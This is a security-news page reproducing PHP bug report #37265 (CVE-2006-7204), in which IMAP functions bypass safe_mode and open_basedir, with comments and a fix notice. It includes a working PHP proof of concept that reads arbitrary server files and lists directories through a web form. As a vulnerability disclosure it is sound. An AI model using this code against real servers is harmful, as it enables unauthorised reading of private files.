Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2006-7204: imap_body able to bypass php_openbasedir

The imap_body function in PHP before 4.4.4 does not implement safemode or open_basedir checks, which allows local users to read arbitrary files or list arbitrary directory contents.

CVE
#vulnerability#apache#git#php

Bug #37265

imap_body able to bypass php_openbasedir

Submitted:

2006-05-01 17:02 UTC

Modified:

2006-08-04 20:34 UTC

Votes:

3

Avg. Score:

4.7 ± 0.5

Reproduced:

3 of 3 (100.0%)

Same Version:

2 (66.7%)

Same OS:

2 (66.7%)

From:

Challii at btinternet dot com

Assigned:

iliaa (profile)

Status:

Closed

Package:

IMAP related

PHP Version:

5.1.3, 4.4.2

OS:

RHE3

Private report:

No

CVE-ID:

None

[2006-05-01 17:02 UTC] Challii at btinternet dot com

Description:

Vulnerability in c-client library (tested with versions 2000,2001,2004), mail_open could be used to open stream to local files.

For php and imap module

imap_open allow to bypass safemode and open_basedir restrictions. Use imap_body or others to view a file and imap_list to recursively list a directory.

s/mailbox/file :) imap_createmailbox imap_deletemailbox imap_renamemailbox to create,delete,rename files with apache privileges.

Reproduce code:

code

<form action="" method="post"> <select name="switch"> <option selected="selected" value="file">View file</option> <option value="dir">View dir</option> </select> <input type="text" size="60" name="string"> <input type="submit" value="go"> </form>

<?php $string = !empty($_POST[‘string’]) ? $_POST[‘string’] : 0; $switch = !empty($_POST[‘switch’]) ? $_POST[‘switch’] : 0;

if ($string && $switch == “file”) { $stream = imap_open($string, "", “”); if ($stream == FALSE) die(“Can’t open imap stream”);

$str = imap_body($stream, 1); if (!empty($str)) echo "<pre>".$str."</pre>"; imap_close($stream); } elseif ($string && $switch == “dir”) { $stream = imap_open("/etc/passwd", "", “”); if ($stream == FALSE) die(“Can’t open imap stream”);

$string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), “*”); echo "<pre>"; for ($i = 0; $i < count($dir_list); $i++) echo "$dir_list[$i]\n"; echo "</pre>"; imap_close($stream); } ?>

################

Expected result:

That the file could not be accessed due to a security permission

Actual result:

The ability to see any file on the server.

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2006-05-01 19:28 UTC] judas dot iscariote at gmail dot com

a PHP dev can correct me if Im wrong, but this is not a PHP bug.

if the mail_open() function of the c-client library allows to read arbitrary files on the server, it’s not precisely a PHP problem right ?

php extension can do what the underlying library API permits.

[2006-05-02 18:46 UTC] challii at btinternet dot com

The underlying system has to be able to access different files based on the overlying system configuration and where mailboxes are etc.

The problem lies in the fact that the imap_body doesn’t adhere to the php_openbasedir restrictions.

[2006-08-04 20:34 UTC] [email protected]

This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change will be in the next snapshot. You can grab the snapshot at http://snaps.php.net/.

Thank you for the report, and for helping us make PHP better.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907